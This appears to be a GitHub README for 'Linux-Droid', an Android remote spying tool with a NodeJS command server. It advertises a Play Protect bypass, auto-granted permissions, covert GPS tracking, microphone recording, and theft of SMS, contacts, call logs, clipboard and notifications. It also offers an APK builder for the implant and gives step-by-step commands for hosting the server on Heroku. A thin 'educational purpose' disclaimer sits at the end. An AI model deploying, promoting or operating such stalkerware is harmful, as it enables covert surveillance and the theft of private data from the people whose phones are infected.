Skip to content

Latest commit

 

History

History
64 lines (43 loc) · 2.22 KB

README.md

File metadata and controls

64 lines (43 loc) · 2.22 KB


A cloud based Android Spying or Monitoring Tool, Powered by NodeJS

Features

  • Auto Allow Permissions
  • Bypassed Play Protect
  • Device Admin [Mannual]
  • GPS Logging
  • Microphone Recording
  • View Contacts
  • SMS Logs
  • Send SMS
  • Call Logs
  • View Installed Apps
  • View Stub Permissions
  • Live Clipboard Logging
  • Live Notification Logging
  • View WiFi Networks
  • File Explorer & Downloader
  • Command Queuing
  • Built In APK Builder

Installation on Server and VPS Click Here

Installation on Heroku Free Server

Video Tutorial for Heroku Click Here

  1. Create a Account on Heroku

  2. Click Create New App in Heroku Dashboard

  3. Enter App Name and click on create app

  4. Now install Heroku CLI on your Computer Instuctions

  5. Now open your terminal and run command git clone -b herooku https://github.com/Linux-Droid/Linux-Droid

  6. It will download Latest codes for you in your PC

  7. Now change the directory to Linux-Droid using command cd Linux-Droid

  8. Now Login into Heroku CLI using command heroku login -i now enter your login details and hit Enter

  9. After Login run this command in terminal heroku git:remote -a appName here appName will be your app's name that you choose while creating the app.

  10. Now run follow commands in termial to install packages heroku buildpacks:add heroku/jvm then run heroku buildpacks:add heroku/nodejs

  11. Now run this command in your terminal git push heroku herooku:master, if this gives an error try this git push -f heroku herooku:master

  12. All done now it will take time to complete, after that you can visit your domain shown in terminal.

Happy Hacking

Disclaimer

Linux_Droid Provides No Warranty With This Software and Will Not be Responsible for Any Direct or Indirect Damage Caused Due to The Usage of This Tool.
Linux_Droid is built for Educational Purpose. Use At Your Own Risk.


Made with ❤️ By Linux_Droid